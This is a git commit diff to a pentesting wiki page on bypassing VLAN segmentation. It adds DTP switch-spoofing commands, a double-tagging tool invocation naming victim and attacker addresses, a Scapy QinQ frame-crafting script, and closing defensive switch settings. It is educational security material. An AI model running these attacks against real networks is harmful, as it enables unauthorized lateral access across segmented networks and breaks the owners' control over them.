Merge pull request #1149 from HackTricks-wiki/research_update_src_generic-methodologies-and-resources_pentesting-network_lateral-vlan-segmentation-bypass_20250718_014054

carlospolop · web-flow · commit a96761d9e6dd · 2025-07-18T20:01:43.000+02:00
Research Update Enhanced src/generic-methodologies-and-resou...
diff --git a/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md b/src/generic-methodologies-and-resources/pentesting-network/lateral-vlan-segmentation-bypass.md
@@ -60,11 +60,84 @@ Connectivity is tested by initiating ICMP requests to the default gateways for V
 
 Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.
 
-## References
+---
 
-- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
+## Other VLAN-Hopping Techniques (no privileged switch CLI)
 
-{{#include ../../banners/hacktricks-training.md}}
+The previous method assumes authenticated console or Telnet/SSH access to the switch.  In real-world engagements the attacker is usually connected to a **regular access port**.  The following Layer-2 tricks often let you pivot laterally without ever logging into the switch OS:
+
+### 1. Switch-Spoofing with Dynamic Trunking Protocol (DTP)
+
+Cisco switches that keep DTP enabled will happily negotiate a trunk if the peer claims to be a switch.  Crafting a single **DTP “desirable”** or **“trunk”** frame converts the access port into an 802.1Q trunk that carries *all* allowed VLANs.
+
+*Yersinia* and several PoCs automate the process:
+
+```bash
+# Become a trunk using Yersinia (GUI)
+$ sudo yersinia -G          # Launch GUI → Launch attack → DTP → enabling trunking
+
+# Python PoC (dtp-spoof)
+$ git clone https://github.com/fleetcaptain/dtp-spoof.git
+$ sudo python3 dtp-spoof/dtp-spoof.py -i eth0 --desirable
+```
+
+Once the port switches to trunk you can create 802.1Q sub-interfaces and pivot exactly as shown in the previous section.  Modern Linux kernels no longer require *vconfig*; instead use *ip link*:
+
+```bash
+sudo modprobe 8021q
+sudo ip link add link eth0 name eth0.30 type vlan id 30
+sudo ip addr add 10.10.30.66/24 dev eth0.30
+sudo ip link set eth0.30 up
+```
+
+### 2. Double-Tagging (Native-VLAN Abuse)
+
+If the attacker sits on the **native (untagged) VLAN**, a crafted frame with *two* 802.1Q headers can "hop" to a second VLAN even when the port is locked in access mode.  Tooling such as **VLANPWN DoubleTagging.py** (2022-2024 refresh) automates the injection:
 
+```bash
+python3 DoubleTagging.py \
+        --interface eth0 \
+        --nativevlan 1 \
+        --targetvlan 20 \
+        --victim 10.10.20.24 \
+        --attacker 10.10.1.54
+```
+
+Packet walk-through:
+1. Outer tag (1) is stripped by the first switch because it matches the native VLAN.
+2. Inner tag (20) is now exposed; the frame is forwarded onto the trunk towards VLAN 20.
+
+The technique still works in 2025 on networks that leave the native VLAN at the default and accept untagged frames .
+
+### 3. QinQ (802.1ad) Stacking
+
+Many enterprise cores support *Q-in-Q* service provider encapsulation.  Where permitted, an attacker can tunnel arbitrary 802.1Q-tagged traffic inside a provider (S-tag) to cross security zones.  Capture for 802.1ad ethertype 0x88a8 and attempt to pop the outer tag with Scapy:
+
+```python
+from scapy.all import *
+outer = 100      # Service tag
+inner = 30       # Customer / target VLAN
+payload = Ether(dst="ff:ff:ff:ff:ff:ff")/Dot1Q(vlan=inner)/IP(dst="10.10.30.1")/ICMP()
+frame = Dot1Q(type=0x88a8, vlan=outer)/payload
+sendp(frame, iface="eth0")
+```
 
+---
 
+## Defensive Recommendations
+
+1. Disable DTP on all user-facing ports: `switchport mode access` + `switchport nonegotiate`.
+2. Change the native VLAN on every trunk to an **unused, black-hole VLAN** and tag it:  `vlan dot1q tag native`.
+3. Prune unnecessary VLANs on trunks: `switchport trunk allowed vlan 10,20`.
+4. Enforce port security, DHCP snooping & dynamic ARP inspection to limit rogue Layer-2 activity.
+5. Prefer private-VLANs or L3 segmentation instead of relying solely on 802.1Q separation.
+
+---
+
+## References
+
+- [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
+- VLANPWN attack toolkit – <https://github.com/casterbytethrowback/VLANPWN>
+- Twingate "What is VLAN Hopping?" (Aug 2024) – <https://www.twingate.com/blog/glossary/vlan%20hopping>
+
+{{#include ../../banners/hacktricks-training.md}}
